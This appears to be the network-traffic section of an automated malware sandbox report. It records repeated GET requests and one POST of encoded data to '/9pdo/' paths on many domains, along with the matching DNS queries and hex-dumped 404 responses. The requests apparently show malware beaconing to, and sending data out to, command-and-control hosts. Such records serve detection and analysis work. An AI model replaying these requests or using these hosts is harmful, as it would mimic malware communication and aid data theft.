Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=VHiI6b/PPIA+OuARKaswq4b959D7SkxlZx7zpnglo7qdO2KXbQcQ9KuRFrEQ+F9C9sgTMWbLOSxIFzstzFciu1MPjvyftGkFxn6hWuyxlTlwRkGEMIrwXeI=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.fraternize.orgUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=3VEjKqPjJRFd1LEr7ftl6AeEjohVN1gCDcT03q/HcmbmUvzHTf5Gj5hvcK/QqTejry7alcBNCY2t4H+vJZJIHp8tocbCa9LgYeFrT1dxHygs+eIMLFxUj+8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.electra-airways.infoUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=yWfXl3cQ7AE/v0p5ToAuwZLyk9Lhh0mNZnY0Fx87Qovx7+j0M2U0eDvKbOG4Eg1byXAdYPqGQWGzsH9rY6evN1VfPnxdp8WTE2/W4NT8KnWPJn/Hhe+jCJU=&FJ0pD=Txf0EHJ0JZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.huatihui2.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=DnYaRovP48GzkkJrYMb+2fT4Pkhg/GvwuVP/6iFiedv+ORSC+0oTk/Gl1D7Kx2hOtjeczUyzMCTs4BuiBiMVlNIM74EOcC0w4I/7Krg2VTUnK1jygYdG7TE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=9/X38tn9qLO2xSF02XBR/rEx8jnqUAkCRmtcXfkuabXCkgKRDBhcw5/s5NSemU/1fww/nV1egvBpaCqwFnie4syGBvlnyI6Zu2K3XALMlG8T/sDwKknxjFA=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.jt-berger.storeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=REEnkW6M+TEq7R0RTFMUOKmG2dqiBXhD8cCdAclTZkEAO29Celit1EFdRt8L6G9Xd5xqtutsMklg2OrtOvYk99njtWVeRq/fD9R4HBgWh9ZRW3T/b1Zn0KY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.n-benriya002.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=exLCvVI2E5RJM8xtzs0Xap+s8OiVQ9Xf+6d2cWgRCMmdoFVcUWazUq00e3zK6s54E+NAVH76kqhd1uh4f2sE6XSWR+uNBmxDzZmQYEOmQjbtsHV8VYB5rTQ=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.scwspark.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=/vSyP1yVbm8RGq0e2H3CzkNsaOHJl/3MYALL4DCZeeN+d5B22Kt3zVmvOtiuNe7fMoA4lcLFRPd10Vr4k50RXoBd/BdrO+PNRq+sm2OxhUPGBDukAmwFGJM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.eternalsunrise.xyzUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=J74hxHnGBH885BsW/8LXuNayyRNuPuSw4YspDnAEOKjh6WzTsbZVB7IKidTzlzfz/fWZ1zjvjb/XglRuOdKt4pl2brCljwyM4WC3fqBpCAw3lcb8459c8o0=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.roundhaygardenscene.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?dzzh=OxSxCH&QtQ=75RROWlFumYQQsRs+uDtc9uO+AXAqD8lv3fdL7/s35lj/OH9yxtYyj6nA6/7e2iXtS5R0Es4/LmqSDkvv7i6GZpCVVRFzb5vAOsXkTj5IR3tGpdpZrpWv9I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.klingerlumberltd.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9pdo/?QtQ=VHiI6b/PPIA+OuARKaswq4b959D7SkxlZx7zpnglo7qdO2KXbQcQ9KuRFrEQ+F9C9sgTMWbLOSxIFzstzFciu1MPjvyftGkFxn6hWuyxlTlwRkGEMIrwXeI=&dzzh=OxSxCH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeHost: www.fraternize.orgUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4

Source: global traffic	DNS traffic detected: DNS query: nobel.rs
Source: global traffic	DNS traffic detected: DNS query: www.ejbodyart.com
Source: global traffic	DNS traffic detected: DNS query: www.jt-berger.store
Source: global traffic	DNS traffic detected: DNS query: www.n-benriya002.com
Source: global traffic	DNS traffic detected: DNS query: www.scwspark.com
Source: global traffic	DNS traffic detected: DNS query: www.eternalsunrise.xyz
Source: global traffic	DNS traffic detected: DNS query: www.roundhaygardenscene.com
Source: global traffic	DNS traffic detected: DNS query: www.klingerlumberltd.com
Source: global traffic	DNS traffic detected: DNS query: www.fraternize.org
Source: global traffic	DNS traffic detected: DNS query: www.electra-airways.info
Source: global traffic	DNS traffic detected: DNS query: www.mirkogrigolettoshop.com
Source: global traffic	DNS traffic detected: DNS query: www.avolci.com
Source: global traffic	DNS traffic detected: DNS query: www.huatihui2.com
Source: global traffic	DNS traffic detected: DNS query: www.sallielareine.com
Source: global traffic	DNS traffic detected: DNS query: www.maaltijdkado.com
Source: global traffic	DNS traffic detected: DNS query: www.stevethatcher.com
Source: global traffic	DNS traffic detected: DNS query: www.aneiina.top
Source: global traffic	DNS traffic detected: DNS query: www.gattosat.icu
Source: global traffic	DNS traffic detected: DNS query: www.raymondj.online
Source: global traffic	DNS traffic detected: DNS query: www.thegochettway.com
Source: global traffic	DNS traffic detected: DNS query: www.jroblox.com
Source: global traffic	DNS traffic detected: DNS query: www.huahuas.pics

Source: unknown

HTTP traffic detected: POST /9pdo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 200Connection: closeCache-Control: no-cacheHost: www.jt-berger.storeOrigin: http://www.jt-berger.storeReferer: http://www.jt-berger.store/9pdo/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4Data Raw: 51 74 51 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 34 68 56 33 39 45 78 32 2f 70 45 76 31 45 53 4e 62 53 74 57 57 55 56 72 52 66 38 4f 48 36 44 43 68 41 76 2f 4c 6b 41 68 6c 62 58 49 33 4a 79 6b 6f 57 53 44 63 58 6b 31 37 46 4a 76 6a 66 42 6b 54 78 44 68 4e 6d 36 6d 2b 37 4b 69 44 39 70 47 77 35 75 31 6b 6c 36 34 66 77 6d 71 74 57 34 71 7a 39 32 53 42 6b 76 63 76 6d 78 6a 41 59 6f 61 43 63 4e 56 38 56 57 38 34 79 58 77 37 76 37 58 74 5a 58 57 68 30 66 47 52 73 6c 73 72 45 45 73 72 46 33 69 31 37 6f 45 43 4f 31 44 7a 59 6b 56 74 6b 70 79 56 51 70 37 52 36 63 46 33 6e 7a 76 78 51 70 6a 31 51 3d 3d Data Ascii: QtQ=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i17oECO1DzYkVtkpyVQp7R6cF3nzvxQpj1Q==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 18:26:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 03 May 2024 18:26:31 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 03 May 2024 18:26:34 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 03 May 2024 18:26:37 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Fri, 03 May 2024 18:26:40 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 18:26:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 18:26:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 